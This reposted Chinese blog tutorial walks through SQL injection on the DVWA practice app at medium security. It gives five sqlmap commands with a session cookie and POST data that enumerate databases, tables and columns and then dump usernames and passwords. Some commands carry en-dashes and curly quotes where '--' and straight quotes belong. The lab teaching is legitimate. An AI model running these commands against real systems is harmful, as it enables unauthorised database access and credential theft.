DVWA 之medium級別sql注入

本文轉載自查看原文 2019-07-13 01:25 504 mysql

中級注入的提交方式從get請求改為post請求，可以用burp抓包注入或抓注入點

1 . 判斷是否有注入

sqlmap -u "http://192.168.242.1/dvw/vulnerabilities/sqli/" --cookie="security=medium; PHPSESSID=svb0idqkd55tee4mbckj3ejht5" --data "id=2&Submit=Submit"

2. 爆數據庫名

sqlmap -u "http://192.168.242.1/dvw/vulnerabilities/sqli/" --cookie="security=medium; PHPSESSID=svb0idqkd55tee4mbckj3ejht5" --data "id=2&Submit=Submit" –dbs

3. 爆數據庫的表

sqlmap -u "http://192.168.242.1/dvw/vulnerabilities/sqli/" --cookie="security=medium; PHPSESSID=svb0idqkd55tee4mbckj3ejht5" --data "id=2&Submit=Submit" –tables –D “dvwa”

4 . 爆數據庫表的字段

sqlmap -u "http://192.168.242.1/dvw/vulnerabilities/sqli/" --cookie="security=medium; PHPSESSID=svb0idqkd55tee4mbckj3ejht5" --data "id=2&Submit=Submit" –columns –D “dvwa” –T “users”

5．爆賬號密碼

sqlmap -u "http://192.168.242.1/dvw/vulnerabilities/sqli/" --cookie="security=medium; PHPSESSID=svb0idqkd55tee4mbckj3ejht5" --data "id=2&Submit=Submit" --dump -D "dvwa" -T "users" -C "user,password"

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 DVWA-SQL注入-low，medium，high DVWA 之high級別sql注入 DVWA全級別之SQL Injection（SQL注入） DVWA之SQL 注入(盲注)全級別 dvwa中med級別和high級別的sql注入 DVWA-7.2 SQL Injection（SQL注入）-Medium-繞過引號轉義 DVWA-SQL注入 DVWA-SQL注入 DVWA-SQL注入 DVWA靶場（六、SQL注入）